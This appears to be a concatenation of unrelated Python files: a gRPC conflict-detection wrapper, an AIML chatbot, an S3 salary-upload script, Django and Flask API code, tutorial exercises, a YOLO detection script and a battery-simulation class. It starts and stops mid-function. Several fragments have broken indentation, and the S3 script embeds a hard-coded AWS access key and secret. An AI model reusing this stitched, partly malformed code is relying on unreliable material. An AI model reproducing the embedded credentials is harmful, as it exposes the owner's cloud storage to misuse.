    # when target_type is none of the three expected values -- validate input.
    if target_type == 'add_single':
        target_reqs_dict = wrap_add_single_requirement(target_data)
    elif target_type == 'tree':
        target_reqs_dict = wrap_tree_requirements(target_data)
    elif target_type == 'edit_single':
        target_reqs_dict = wrap_edit_single_requirement(target_data)
    # wrap compared_reqs_list
    compared_reqs_dict = wrap_compared_requirements(compared_reqs_list)
    # Merge into one dict, convert to a list, then ask the gRPC service.
    sum_reqs_dict = dict(compared_reqs_dict, **target_reqs_dict)
    sum_reqs_list = [req for req in sum_reqs_dict.values()]
    # Call the gRPC conflict-detection service.
    resp = GrpcClient().conflictdetect(json.dumps({'items': sum_reqs_list}))
    resp = json.loads(resp)
    print(resp)
    # Wrap the response: keep only conflicts touching a submitted requirement.
    res = []
    for item in resp['conflicts']:
        id0 = item['requirements'][0]['id']
        id1 = item['requirements'][1]['id']
        if (id0 not in target_reqs_dict) and (id1 not in target_reqs_dict):
            continue
        if id0 in target_reqs_dict:
            req0 = {
                'name': target_reqs_dict[id0]['name'],
                'description': target_reqs_dict[id0]['description'],
            }
        else:
            req0 = {
                'name': compared_reqs_dict[id0]['name'],
                'description': compared_reqs_dict[id0]['description'],
            }
        if id1 in target_reqs_dict:
            req1 = {
                'name': target_reqs_dict[id1]['name'],
                'description': target_reqs_dict[id1]['description'],
            }
        else:
            req1 = {
                'name': compared_reqs_dict[id1]['name'],
                'description': compared_reqs_dict[id1]['description'],
            }
        res.append({'_type': item['type'], 'req0': req0, 'req1': req1})
    return {
        'meta': META_SUCCESS,
        'data': res
    }
|
import aiml
# Loads an AIML knowledge base, seeds the bot's predicate slots via the
# SK1..SK35 primer responses, then runs an interactive chat loop.
# NOTE(review): raw_input and the print statement make this Python 2 only.
# Create the kernel and learn AIML files
mybot=aiml.Kernel()
#mybot.setbotpredicate("name","Armin")
mybot.learn('AIMLData.aiml')
# Each SKn response stores one predefined bot fact inside the kernel.
mybot.respond("SK1 BotMaster")
mybot.respond("SK2 Student")
mybot.respond("SK3 Floki")
mybot.respond("SK4 Robot")
mybot.respond("SK5 Egypt")
mybot.respond("SK6 Male")
mybot.respond("SK7 Chat Robot")
mybot.respond("SK8 128MB")
mybot.respond("SK9 1/7/2017")
mybot.respond("SK10 Portsaid,Egypt")
mybot.respond("SK11 artificial intelligence")
mybot.respond("SK12 Abdelfatah el sisi")
mybot.respond("SK13 HER ")
mybot.respond("SK14 Muslim")
mybot.respond("SK15 electricity")
mybot.respond("SK16 Black")
mybot.respond("SK17 Electronic Brain")
mybot.respond("SK18 Tom Hanks")
mybot.respond("SK19 Egyptian/American ")
mybot.respond("SK20 chat online")
mybot.respond("SK21 Dust it off")
mybot.respond("SK22 artificial intelligence with python 2nd Edition")
mybot.respond("SK23 Computer Software")
mybot.respond("SK24 Sharmofers")
#mybot.respond("SK25 www.floki.com")
mybot.respond("SK26 test")
mybot.respond("SK27 English")
mybot.respond("SK28 no girlfriend")
mybot.respond("SK29 One ")
mybot.respond("SK30 What's your favorite movie?")
mybot.respond("SK31 Mediator type")
mybot.respond("SK32 I am not really interested in sex")
mybot.respond("SK33 I am always trying to stop fights")
mybot.respond("SK34 I don't pay much attention to my feelings")
mybot.respond("SK35 I always put others before myself")
#mybot.respond("SK35 info@Floki.org")
# Interactive loop: type "quit" to leave.
while True:
    message = raw_input("Enter your message >> ")
    if message == "quit":
        exit()
    # elif message == "save":
    #     kernel.saveBrain("bot_brain.brn")
    else:
        print mybot.respond(message)
|
import pandas as pd
import json
from boto.s3.connection import S3Connection
from boto.s3.key import Key
# Maps vendor ("VV") player names to PGA names and uploads the salary table
# to S3 twice: once globally and once under the tournament/year key.
year = 2015
tournament = 'Valero Texas Open'
# create connection to bucket
# SECURITY(review): hard-coded AWS access key and secret committed to source
# control -- rotate these immediately and load them from the environment or
# an AWS credentials profile instead.
c = S3Connection('AKIAIQQ36BOSTXH3YEBA','cXNBbLttQnB9NB3wiEzOWLF13Xw8jKujvoFxmv3L')
# create connection to bucket
b = c.get_bucket('public.tenthtee')
k = Key(b)
k.key = 'playerData/vvToPgaMapping'
player_map = k.get_contents_as_string()
player_map = json.loads(player_map)
salaries = pd.read_csv('https://s3.amazonaws.com/public.tenthtee/vv/VVSalaries.csv')
salaries_map = {}
for index,row in salaries.iterrows():
    pga_name = player_map['players'][row['PlayerName']]
    # NOTE(review): DataFrame.set_value was removed in modern pandas; .at
    # is the replacement if this is ever upgraded.
    salaries.set_value(index,'PlayerName',pga_name)
    salaries_map[pga_name] = int(row['Salary'])
# Serialized {pga_name: salary} map, published world-readable.
salaries_map = json.dumps(salaries_map)
k2 = Key(b)
k2.key = 'vv/salaries'
k2.set_contents_from_string(salaries_map)
k2.make_public()
k3 = Key(b)
k3.key = 'vv/' + str(year) + '/' + tournament + '/salaries'
k3.set_contents_from_string(salaries_map) |
from core.renderers import CoreJSONRenderer
class TopicRenderer(CoreJSONRenderer):
    # Renders a single object under "topic" and paginated lists under
    # "topics"/"topicsCount".
    object_label = 'topic'
    pagination_object_label = 'topics'
    pagination_count_label = 'topicsCount'
class PreferenceRenderer(CoreJSONRenderer):
    # Renders a single object under "preference" and paginated lists under
    # "preferences"/"preferencesCount".
    object_label = 'preference'
    pagination_object_label = 'preferences'
    pagination_count_label = 'preferencesCount'
class MediumRenderer(CoreJSONRenderer):
object_label = 'medium'
pagination_object_label = 'mediums'
pagination_count_label = 'mediumsCount' |
# while loop: keeps executing the body until the condition becomes False.
# Useful for repetitive tasks.
# Usage advice:
# 1. Prefer for loops; reach for while loops sparingly.
# 2. Re-check every while statement to make sure its boolean test
#    eventually becomes False.
# 3. If unsure, print the tested value at the end of the loop body and
#    inspect the result.
# NOTE(review): Python 2 print statements; run this under Python 2.
i = 0
numbers = []
while i < 6:
    print "At the top i is %d" % i
    numbers.append(i)
    i += 1
    print "Numbers now: ", numbers
    print " At the bottom i is %d" % i
print "The numbers:"
for num in numbers:
print num |
#!/usr/bin/env python
#-*-coding:utf-8-*-
'''
In England the currency is made up of pound, £, and pence,
p, and there are eight coins in general circulation:
1p, 2p, 5p, 10p, 20p, 50p, £1 (100p) and £2 (200p).
It is possible to make £2 in the following way:
1×£1 + 1×50p + 2×20p + 1×5p + 1×2p + 3×1p
How many different ways can £2 be made using any number of coins?
'''
import timeit
# slow
def loop(total):
    """Count the ways to make ``total`` pence from UK coins by brute force.

    Counts of the 200p..2p coins are enumerated; any remainder is filled
    with 1p coins, so every combination whose weighted sum is <= total
    corresponds to exactly one way of making ``total``.

    Improvements over the original:
      * each loop range is bounded by the amount still remaining, and the
        innermost 2p loop is replaced by the closed form ``r // 2 + 1`` —
        the count is identical but ~28 million wasted iterations vanish;
      * the confusing ``l*20++m*10`` double-plus is gone.
    """
    cnt = 0
    for n200 in range(total // 200 + 1):
        r200 = total - 200 * n200
        for n100 in range(r200 // 100 + 1):
            r100 = r200 - 100 * n100
            for n50 in range(r100 // 50 + 1):
                r50 = r100 - 50 * n50
                for n20 in range(r50 // 20 + 1):
                    r20 = r50 - 20 * n20
                    for n10 in range(r20 // 10 + 1):
                        r10 = r20 - 10 * n10
                        for n5 in range(r10 // 5 + 1):
                            # All 2p counts with 2*n2 <= remaining amount.
                            cnt += (r10 - 5 * n5) // 2 + 1
    return cnt
# fast
def recursive(total, coins):
    """Count the ways to make ``total`` from the descending coin list ``coins``.

    Generalized base case: when only one coin value remains, the amount is
    makeable iff it divides evenly — so the smallest coin no longer has to
    be 1 (the original assumed ``coins`` ended in ``[1]``). Behavior for
    lists ending in 1 is unchanged.
    """
    if len(coins) == 1:
        return 1 if total % coins[0] == 0 else 0
    largest = coins[0]
    cnt = 0
    # Try every feasible count of the largest coin, recurse on the rest.
    for used in range(total // largest + 1):
        cnt += recursive(total - largest * used, coins[1:])
    return cnt
if __name__ == '__main__':
    # Prints the answer both ways, then times each approach once.
    # NOTE(review): Python 2 print statements; run under Python 2.
    print loop(200)
    print recursive(200, [200, 100, 50, 20, 10, 5, 2, 1])
    print timeit.Timer('problem_031.loop(200)', 'import problem_031').timeit(1)
    print timeit.Timer('problem_031.recursive(200, [200, 100, 50, 20, 10, 5, 2, 1])',
                       'import problem_031').timeit(1)
|
from django.urls import path
from .views import (dashboard,
team_members,
profile,
create_team,
leave_team,
membership_request,
cancel_request,
accept_request,
remove_request,
search_users)
urlpatterns = [
path('', dashboard, name='dashboard'),
path('team/', team_members, name='team-members'),
path('<str:username>/profile/', profile, name='profile'),
path('team/create', create_team, name='create-team'),
path('team/leave', leave_team, name='leave-team'),
path('team/membership', membership_request, name='membership-request'),
path('team/cancel-request', cancel_request, name='cancel-request'),
path('team/accept-request', accept_request, name='accept-request'),
path('team/remove-request', remove_request, name='remove-request'),
path('team/search-users', search_users, name='search-users'),
] |
from detect import YOLO
from PIL import Image
import imutils
import cv2
import os
# Batch-runs YOLO detection over every .jpg/.bmp file in ./test/, draws the
# predicted boxes and labels, and displays each annotated image (press any
# key to advance).
yolo = YOLO()
files = os.listdir('./test/')
for file in files:
    if file.endswith('jpg') or file.endswith('bmp'):
        image_path = './test/' + file
        image = cv2.imread(image_path)
        boxes = yolo.detect_image(Image.open(image_path))
        print(image_path)
        if len(boxes) > 0:
            for box in boxes:
                # Box layout used below: [x1, y1, x2, y2, score, class].
                x1 = box[0]
                y1 = box[1]
                x2 = box[2]
                y2 = box[3]
                score = box[4]
                predicted_class = box[5]
                cv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0), 2)
                #label = str(predicted_class) + ':' + str(score)[:4]
                label = str(predicted_class) + ' ' + str(score * 100)[:4] + '%'
                cv2.putText(image, label, (x1, y1-10), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2)
        image = imutils.resize(image, width=720)
        cv2.imshow('', image)
        cv2.waitKey(0)
|
__author__ = 'Stuart'
from flask import jsonify, request, g, abort, url_for, current_app
from .. import db
from ..models import Post, Permission
from . import api
from .decorators import permission_required
from .errors import forbidden
@api.route('/posts/')
def get_posts():
    """Return one page of blog posts plus prev/next page links and the total count.

    The page number comes from the ``page`` query argument (default 1); page
    size comes from the FLASKY_POSTS_PER_PAGE config setting.
    """
    page = request.args.get('page', 1, type=int)
    pagination = Post.query.paginate(
        page,
        per_page=current_app.config['FLASKY_POSTS_PER_PAGE'],
        error_out=False)
    prev_link = (url_for('api.get_posts', page=page - 1, _external=True)
                 if pagination.has_prev else None)
    next_link = (url_for('api.get_posts', page=page + 1, _external=True)
                 if pagination.has_next else None)
    return jsonify({
        'posts': [item.to_json() for item in pagination.items],
        'prev': prev_link,
        'next': next_link,
        'count': pagination.total
    })
@api.route('/posts/<int:id>')
def get_post(id):
    """Return a single blog post as JSON, or a 404 if it does not exist.

    The 404 error handler lives at app level but serves JSON if the client
    requests that format; override it in the blueprint if a web-service
    specific response is ever wanted.
    :param id: primary key of the post
    :return: JSON representation of the post
    """
    post = Post.query.get_or_404(id)
    return jsonify(post.to_json())
@api.route('/posts/', methods=['POST'])
@permission_required(Permission.WRITE_ARTICLES)
def new_post():
    """Create a new blog post from the JSON request body.

    The permission_required decorator ensures the authenticated user may
    write. The post is built from the JSON payload with its author set
    explicitly to the authenticated user. After the commit, a 201 status is
    returned with a Location header for the new resource; the body echoes
    the resource as JSON so the client needn't issue a follow-up GET.
    :return: (json body, 201, Location header)
    """
    post = Post.from_json(request.json)
    post.author = g.current_user
    db.session.add(post)
    db.session.commit()
    return jsonify(post.to_json()), 201, {'Location': url_for('api.get_post', id=post.id, _external=True)}
@api.route('/posts/<int:id>', methods=['PUT'])
@permission_required(Permission.WRITE_ARTICLES)
def edit_post(id):
    """Update the body of an existing blog post.

    Write permission is checked by the decorator; additionally the caller
    must be the post's author or an administrator. DELETE is intentionally
    not implemented — the application does not allow post deletion.
    :param id: primary key of the post to edit
    :return: JSON representation of the updated post, or 403 if forbidden
    """
    post = Post.query.get_or_404(id)
    if g.current_user != post.author and not g.current_user.can(Permission.ADMINISTER):
        return forbidden("Not permitted")
    post.body = request.json.get('body', post.body)
    db.session.add(post)
    # Persist the change: new_post() commits explicitly, and without this
    # commit the edit is only saved if something else later commits the
    # session.
    db.session.commit()
    return jsonify(post.to_json())
|
from datetime import datetime
from mongoengine import *
from db.config import _MongoengineConnect
from db.sentences.sentence import Sentences
connect(_MongoengineConnect)
class Comments(Document):
    """MongoDB document for a comment attached to a Sentences document."""
    # Reference back to the parent sentence
    belongsto_sentence = ReferenceField((Sentences))#,dbref=True
    # Comment text, capped at 50 characters
    content = StringField(max_length=50)
    # Like counter
    love = IntField()
    # Creation timestamp; default is local time via datetime.now
    add_date = DateTimeField(default=datetime.now, required=True) #datetime.utcnow datetime.now()
|
"""
A simple guess-that-number game. Players take turns guessing a secret number
between lower and upper (normally 0 and 100). After a guess, all players are
informed of the guess as well as if the secret number was lower or higher. The
game ends when some player guesses the secret number correctly. That player is
the winner.
"""
__all__ = ['GTNTracker', 'GTNHoster']
from .hoster import GTNHoster
from .tracker import GTNTracker |
#from .fitting import circuit_fit, computeCircuit, calculateCircuitLength
#from .plotting import plot_nyquist
import matplotlib.pyplot as plt
import numpy as np
### to find confidence intervals for fit parameters:
# SE(Pi) = sqrt[(SS/DF) * conv(i,i)]
# Pi : ith adjustable parameter
# SS: sum of squarewd residuals
# DF: degrees of fredom (number of data points - number of parameters)
# Conv(i,i) : i-thj diagonal element of covariance matrix
class BaseBattery:
"""Base class for physics-based battery models"""
    def __init__(self, initial_parameters=None, estimate_parameters=None, name=None,
                 algorithm=None, bounds=None, chemistry=None, verbose=False):
        """Set up bookkeeping attributes for a physics-based battery model.

        Note: initial_parameters, algorithm and chemistry are accepted but
        not stored here — presumably subclasses consume them; TODO confirm.
        """
        # initialize class attributes
        # assert isinstance(initial_parameters, dict), \
        # "Initial parameters must be a dictionary of name-value pairs"
        # self.initial_guess = initial_guess
        self.estimate_parameters = estimate_parameters
        # from .fitting import opt_wrap
        self.initial_fit = 0
        self.name = name
        self.bounds = bounds
        self.verbose = verbose
        self.initial = None
        self.conf_ = None
        self.inplace = None
        # self.opt = opt_wrap
def _is_fit(self):
""" check if model has been fit (parameters_ is not None) """
if self.parameters_ is not None:
return True
else:
return False
    def charge(self, t=None, current=0.5, from_current_state=False, p=None, trim=False, internal=False):
        """The base wrapper for the model, used for simple charging. Automatically
        transitions from cc to cv depending upon final time.
        Inputs                   Description
        ------                   ------------------------
        t                        A list or numpy array of times to sample at (optional)
        current                  A value for charge current
        from_current_state       Whether or not the simulation should start from the
                                    current state or not - defaults to False, which
                                    simulates the battery from a discharged state
        p                        Defaults to none - present only for wrapping in an optimizer
        trim                     Defaults to False, a value of true will remove the padded numbers
                                    at the end, where False will allow padded values.
        Output                   Description
        ------                   ------------------------
        out                      A list of values for [time, voltage, current] of the simulation"""
        if t is None:
            t = np.linspace(0,5000*(1/current),500)
        if p is None:
            if self.initial_fit == 0:
                p = self.initial
            else:
                # NOTE(review): p aliases self.initial here, so the in-place
                # assignment below mutates self.initial — TODO confirm intended.
                p = self.initial
                p[self.estimate_inds] = self.fitted_parameters
        if from_current_state:
            # Continue from the stored state vector instead of charge_ICs.
            solve = self.model([*p, current, 1], t, initial=self.current_state, internal=internal)
            self.current_state = solve[1][1:]
            self.hist.append(solve[0])
            if internal:
                if trim:
                    return [solve[0][:,solve[0][2]<-0.01], solve[-1]]
                else:
                    return [solve[0], solve[-1]]
            else:
                # NOTE(review): this branch returns a bare array while the
                # not-from_current_state branch below wraps it in a list —
                # callers (e.g. cycle) must handle both shapes.
                if trim:
                    return solve[0][:,solve[2]<-0.01]
                else:
                    return solve[0]
        else:
            solve = self.model([*p, current, 1], t, initial=self.charge_ICs, internal=internal)
            self.current_state = solve[1][1:]
            self.hist.append(solve[0])
            if internal:
                if trim:
                    return [solve[0][:,solve[0][2]<-0.01], solve[-1]]
                else:
                    return [solve[0], solve[-1]]
            else:
                if trim:
                    return [solve[0][:,solve[2]<-0.01]]
                else:
                    return [solve[0]]
    def discharge(self, t=None, current=0.5, from_current_state=False, p=None, trim=False, internal=False):
        """The base wrapper for the model, used for simple discharging.
        Inputs                   Description
        ------                   ------------------------
        t                        A list or numpy array of times to sample at (optional)
        current                  A value for charge current
        from_current_state       Whether or not the simulation should start from the
                                    current state or not - defaults to False, which
                                    simulates the battery from a discharged state
        p                        Defaults to none - present only for wrapping in an optimizer
        trim                     Defaults to False, a value of true will remove the padded numbers
                                    at the end, where False will allow padded values.
        Output                   Description
        ------                   ------------------------
        out                      A list of values for [time, voltage, current] of the simulation"""
        if t is None:
            t = np.linspace(0,4000*(1/current),500)
        if p is None:
            if self.initial_fit == 0:
                p = self.initial
            else:
                # NOTE(review): p aliases self.initial, so this mutates
                # self.initial in place — TODO confirm intended.
                p = self.initial
                p[self.estimate_inds] = self.fitted_parameters
        if from_current_state:
            # Discharge current is the negated magnitude; reuse the stored
            # state with its last entry replaced by the new current.
            solve = self.model([*p, current*-1, 1], t, initial=[*self.current_state[:-1], current*-1], internal=internal)
            self.current_state = solve[1][1:]
            self.hist.append(solve[0])
            if internal:
                if trim:
                    return [solve[0][:,:np.where(solve[0][2]==0)[0][0]+1], solve[-1]]
                else:
                    return [solve[0], solve[-1]]
            else:
                if trim:
                    return [solve[0][:,:np.where(solve[0][2]==0)[0][0]+1]]
                else:
                    return [solve[0]]
        else:
            # print([*p, current*-1, 1], t[-1], self.discharge_ICs, internal)
            solve = self.model([*p, current*-1, 1], t, initial=self.discharge_ICs, internal=internal)
            self.current_state = solve[1][1:]
            self.hist.append(solve[0])
            if internal:
                if trim:
                    return [solve[0][:,:np.where(solve[0][2]==0)[0][0]+1], solve[-1]]
                else:
                    return [solve[0], solve[-1]]
            else:
                if trim:
                    return [solve[0][:,:np.where(solve[0][2]==0)[0][0]+1]]
                # return solve[0][:,solve[2]<-0.01]
                else:
                    return [solve[0]]
    def cycle(self, current=0.5, n=500, charge_first=False, p=None, trim=False):
        """This function calls either a charge then discharge, or a discharge followed
        by a change. When charge_first is set to False, it will start from a charged
        state and discharge, follower by a charge. Otherwise, it will do them
        in reverse order.
        Inputs                   Description
        ------                   ------------------------
        current                  A value for charge and discharge current. These must be the same.
        charge_first             Whether the charge simulation should be run first. Defaults to False.
        n                        The number of points to sample in each charge / discharge cycle. Time is
                                    automatically calculated as tf=4000*(1/current), to ensure the
                                    entire charge or discharge cycle is captured.
        p                        Defaults to none - present only for wrapping in an optimizer
        trim                     Defaults to False, a value of true will remove the padded numbers
                                    at the end, where False will allow padded values.
        Output                   Description
        ------                   ------------------------
        out                      A list of values for [time, voltage, current] of the simulation"""
        # NOTE(review): charge()/discharge() wrap their non-internal returns
        # inconsistently (bare array vs [array] depending on
        # from_current_state), so the `solve[-1][0] += solve[0][0,-1]` time
        # shift below relies on that exact mix of shapes — TODO confirm.
        current = abs(current)
        if charge_first:
            solve = [self.charge(np.linspace(0,4000*(1/current), n), p=p, trim=trim)]
            solve.append(self.discharge(np.linspace(0,4000*(1/current), n), from_current_state=True, p=p, trim=trim))
            # Offset the second leg's clock so time is continuous.
            solve[-1][0] += solve[0][0,-1]
            return np.concatenate(solve, axis=1)
        else:
            solve = [self.discharge(np.linspace(0,4000*(1/current), n), p=p, trim=trim)]
            solve.append(self.charge(np.linspace(0,4000*(1/current), n), from_current_state=True, p=p, trim=trim))
            solve[-1][0] += solve[0][0,-1]
            return np.concatenate(solve, axis=1)
    def piecewise_current(self, times, currents, n_steps=50, from_current_state=False, p=None, internal=False):
        """This function wraps charge and discharge in order to chain them together to
        create the ability to simulate arbitrary piecewise currents. Only supports
        stair-style current stepping, ramps are not supported.
        Inputs
        -------                  ----------------------
        times:                   A list of values representing number of seconds at that current
        currents:                A list of values representing value of the current
        Example:
        spm.piecewise_current([50,100,30,40],[1,-0.5,.5,.3])
        where a negative current represents charging and a positive current
        represents discharge."""
        assert isinstance(times, list), 'times must be a list'
        assert isinstance(currents, list), 'Currents must be a list'
        assert len(times) == len(currents), 'times and currents must be the same length'
        solve = []
        curr = []
        count = 0
        if not from_current_state:
            # Start every fresh simulation from the discharged initial state.
            self.current_state = self.discharge_ICs
        for t, c in zip(times, currents):
            # print(t,c)
            tt = np.linspace(0, t, n_steps)
            # if len(solve)>1:
            #     if solve[-1][-1,-2] <= 2.5:
            #         print(solve[-1][-1,-2])
            #         break
            #     else:
            curr.append(c)
            # if solve[-1]
            # try:
            #     print(solve[-1], t, c)
            # except:
            #     pass
            # Positive current steps discharge; negative steps charge.
            # NOTE(review): if the very first step raises IndexError, `out`
            # is unbound below (the except just prints and falls through).
            if c > 0:
                try:
                    # if internal:
                    out = self.discharge(tt, current=c, from_current_state=True, p=p, internal=internal)
                    # else: # need to nest one layer deeper for downstream code
                    #     out = self.discharge(tt, current=c, from_current_state=True, p=p, internal=internal)
                    # out = self.discharge(tt, current=c, from_current_state=True, p=p, internal=internal)
                    # print(len(out))
                except IndexError:
                    print('failed')
                    pass
                # out = [tt, np.ones(len(tt))*2.5, np.ones(len(tt))*c]
            else:
                try:
                    # if internal:
                    #     out = self.charge(tt, current=c*-1, from_current_state=True, p=p, internal=internal)
                    # else: # need to nest one layer deeper for downstream code
                    out = [self.charge(tt, current=c*-1, from_current_state=True, p=p, internal=internal)]
                except IndexError:
                    print('failed')
                    pass
                # out = np.array([tt, np.ones(len(tt))*4.2, np.ones(len(tt))*c])
            # print(out)
            # add times together
            # if count > 0:
            #     print(solve[-1])
            #     out[0] += solve[-1][0,-1]
            if internal:
                solve.append(out[-1])
            else:
                # add times together
                # print(len(solve))
                # print(solve,out[0][0], out[0])
                if count > 0:
                    # print(solve[-1][0][-1])
                    # print(out[0][0])
                    # Shift this step's clock so the time axis is continuous.
                    out[0][0] += solve[-1][0][-1]
                solve.append(out[0])
            count += 1
        # print(solve)
        if internal:
            # print([s.shape for s in solve])
            # print(solve[-1].shape)
            solve = np.concatenate(solve, axis=0)
        else:
            # print('concatenating')
            # print(solve)
            # print([x.shape] for x in solve)
            solve = np.concatenate(solve, axis=1)
        self.hist.append(solve)
        return solve, curr
#
# def summary(self):
# """
# Returns a Latex render of the equations and node spacings
# used for the current model, in addition to a table
# containing the names and values of the parameters
# """
#
# return
#
    def opt_wrap(self, x0, currents_type, verbose=False):
        """The general optimization wrapping function - this function
        serves to call the numerical solution and calculate the
        root mean squared error at each experimental timepoint
        using cubic interpolation. This ensures that the
        solver has sufficient accuracy while also allowing for
        direct comparisons with the experimental data."""
        from .fitting import rmse
        # Overlay the candidate values x0 onto a copy of the full
        # parameter vector at the indices being estimated.
        x = np.copy(self.initial)
        # print(self.estimate_inds)
        x[self.estimate_inds] = x0
        error = 0
        print(self.count)
        self.count+=1
        try:
            if currents_type == 'constant':
                for t, v, c in zip(self.t_exp, self.v_exp, self.currents):
                    if c > 0:
                        # Positive experimental current: simulate a discharge
                        # from the discharged initial conditions.
                        self.current_state = self.discharge_ICs
                        solve = self.discharge(t, current=c, from_current_state=True, p=x)
                        print(len(solve[0]))
                        error += rmse(solve[0][1], v)
                    else:
                        self.current_state = self.charge_ICs
                        # print(t)
                        solve = self.charge(t, current=-c, from_current_state=True, p=x)
                        # print(solve)
                        # print(len(solve[0][1]))
                        # print(solve[0])
                        error += rmse(solve[1], v)
            else:
                solve = self.piecewise_current(self.t_exp, self.currents, p=x)
                error += rmse(solve[0][:,1], self.v_exp)
            if verbose:
                print(error, x0)
        except:
            # NOTE(review): bare except converts any failure (including
            # programming errors) into the sentinel penalty 100, which the
            # optimizer treats as a bad-but-valid objective value.
            error = 100
            print('failed')
        return error
def fit(self, t_exp, v_exp, currents, currents_type='constant', method="Nelder-Mead", bounds=None, re=0, maxiter=100, tol=None, **kwargs):
"""Model-specific fitting function
Parameters
----------
t_exp: A numpy array containing the series of time values for experimental data
v_exp: A numpy array containing the series of voltage values for experimental data
method: A method to pass to Scipy.optimize.minimize, suggestions include:
- 'Nelder-Mead'
- 'SLSQP'
- 'L-BFGS-B'
bounds: Bounds for the given parameters
"""
# enforce typing
assert isinstance(t_exp,(np.ndarray, list)),\
'time array is not of type np.ndarray'
# assert isinstance(t_exp[0], (float, int, np.int32, np.float64)),\
# 'time array does not contain a number'
assert isinstance(v_exp, (np.ndarray, list)),\
'voltage array is not of type np.ndarray'
# if not interpolate:
assert currents_type in ['constant','piecewise'], \
'currents_type should be either constant or piecewise'
if currents_type == 'constant':
assert len(t_exp) == len(currents), \
'time and current lengths should match'
assert len(t_exp) == len(v_exp), \
'time and voltage lengths should match'
if currents_type == 'piecewise':
assert len(t_exp) == len(currents), \
'time samples and current samples should be of the same length'
self.currents = currents
self.currents_type = currents_type
self.tol = tol
self.maxiter = maxiter
self.count = 0
if re == 0:
self.t_exp = t_exp
self.v_exp = v_exp
# # call the optimizer
from scipy.optimize import minimize
res = minimize(self.opt_wrap, self.initial[self.estimate_inds], args=(self.currents_type, self.verbose),
bounds=bounds, method=method, tol=self.tol, options={'maxiter': self.maxiter})
self.fitted_parameters = res.x
self.error = res.fun
self.initial_fit = 1
self.opt_result = res
return res
def refit(self, method="Nelder-Mead", maxiter=100):
assert self.initial_fit == 1, \
'Please call fit before calling refit'
self.initial[self.estimate_inds] = self.fitted_parameters
self.fit(self.t_exp, self.v_exp, self.currents, method=method, re=1, maxiter=maxiter)
return
    def generate_data(self, filename, n, currents, loglist='auto', pars=None, bounds=None,
                      type='sobol', distribution='uniform', sample_time=None,
                      time_samples=100, summary=True, internal=True, just_sample=False, verbose=False):
        """
        This function uses the existing Julia kernel to generate a set of data, similar to how the
        optimization function works. Since this julia kernel already exists, the calculations are not made in parallel.
        In the future, a separate file may exist which generates the data in parallel. It is recommended to call fit() first,
        in order to establish t_exp. Otherwise, time can be manually input.
        Parameters
        ----------
        filename: The filename for the h5 file the data is saved in (using h5py)
        n : the number of samples to make. For sobol, this is the total number, and for grid, this is the number of
            samples per grid dimension. Be careful using grid, as this can get out of hand very quickly (n^dim)
        currents: the list of applied currents to simulate; each parameter set is solved once per current
        loglist: A list of parameters which should be log spaced. Log spacing is advised for any variable changing
            by more than 100x, i.e. max/min > 100. If 'auto' is given, this will be detected automatically.
            defaults to 'auto'.
        pars: A list of parameters if desired modified parameters are different than the initialized set.
        bounds: Hard upper and lower limits for generating the data. If this is not given, the default is
            (x/1.2, x*1.2) around each initial value. Custom bounds are recommended for good results,
            i.e., fewer failed samples.
        type: defaults to 'sobol', options include 'grid', 'saltelli', and 'random'.
            (NOTE: this parameter shadows the builtin `type` - kept for interface compatibility.)
        distribution: defaults to 'uniform', describes the distribution of the sampling. Options include 'normal', 'uniform', and 'bi-modal'
            (to be implemented)
        sample_time: The times to be interpolated for sampling. Filled values will be 2.5V, in keeping with the final
            discharge voltage. Defaults to linear spacing at 20% longer than t_exp
        time_samples: number of points in the linear timespacing, defaults to 100.
        just_sample: if True, return only the scaled parameter sample without running any simulations.
        Returns
        -------
        [outs, ins] - simulation outputs and the matching de-scaled parameter sets
        (or [None, scaled_sample] when just_sample is True). Failed parameter sets
        are collected in self.failed.
        """
        assert isinstance(filename, str), \
            'Filename must be type string'
        assert isinstance(n, int), \
            'n must be an integer'
        assert isinstance(loglist, (str, list, bool)), \
            'loglist must be a list, False, or "auto"'
        assert type in ['grid', 'sobol', 'saltelli', 'random'], \
            'Available arguments for type are {}'.format(['grid', 'sobol', 'saltelli', 'random'])
        # t_exp/currents may not exist yet if fit() has not been called;
        # in that case the consistency check is skipped entirely.
        try:
            assert isinstance(self.t_exp, (np.ndarray, list)), \
                't_exp must be a list of numpy arrays matching the length of currents given in initial conditions'
            assert len(self.t_exp) == len(self.currents), \
                'Number of currents does not match experimental data - received {} but expected {}'.format(len(self.t_exp), len(self.currents))
        except AttributeError:
            pass
        import time
        self.currents = currents
        self.num_currents = len(self.currents)
        if self.num_currents > 1:
            print('multiple currents detected')
            # high currents fail more often; solve them first
            self.currents = sorted(self.currents, reverse=True)
        self.generate_pars = None
        self.n = n*self.num_currents
        # step 1 - handle the arguments
        if pars is None:
            self.generate_pars = self.estimate_pars
            self.generate_inds = self.estimate_inds
        else:
            self.generate_pars = pars
            self.generate_inds = [i for i, x in enumerate(self.available_parameters) if x in self.generate_pars]
            # self.bounds_inds = [i for i, x in enumerate(self.available_parmeters)]
        assert self.generate_pars is not None
        print(self.generate_inds)
        # set up bounds (used for loglist); default is +/- 20% around each value
        if bounds is None:
            if self.bounds is None:
                self.bounds = [(x/1.2, x*1.2) for x in self.initial[self.generate_inds]]
        else:
            # reorder user-supplied bounds to match available_parameters order
            d1 = dict(zip(pars,range(len(pars))))
            bounds_inds = [d1[i] for i in [self.available_parameters[j] for j in self.generate_inds]]
            self.bounds = [bounds[i] for i in bounds_inds]
        # set up log-spacing
        if loglist is False:
            self.loglist = np.zeros(len(self.generate_pars))
        if isinstance(loglist, list):
            assert len(loglist) == len(self.generate_pars), \
                'expected loglist to be same length as generate_pars, \
                but got {} and {}'.format(len(loglist), len(self.generate_pars))
            self.loglist = loglist
        if loglist == 'auto':
            # NOTE(review): with bounds stored as (lower, upper), lower/upper
            # is < 1 for normal bounds, so this flags nothing; the docstring's
            # max/min > 100 rule suggests x[1]/x[0] was intended - confirm.
            self.loglist = [1 if x[0]/x[1] >= 100 else 0 for x in self.bounds]
        # create the array using the spacing method of choice
        self.raw_sample = None
        if type == 'sobol':
            from sobol_seq import i4_sobol_generate
            self.raw_sample = i4_sobol_generate(len(self.generate_pars),
                                                self.n)
        elif type == 'saltelli':
            from SALib.sample import saltelli
            problem = {'names': self.estimate_pars,
                       'bounds': [[0, 1] for x in self.estimate_pars],
                       'num_vars': len(self.estimate_pars)}
            self.raw_sample = saltelli.sample(problem, self.n, True)
        elif type == 'grid':
            from sklearn.utils.extmath import cartesian
            temp = np.linspace(0, 1, self.n)
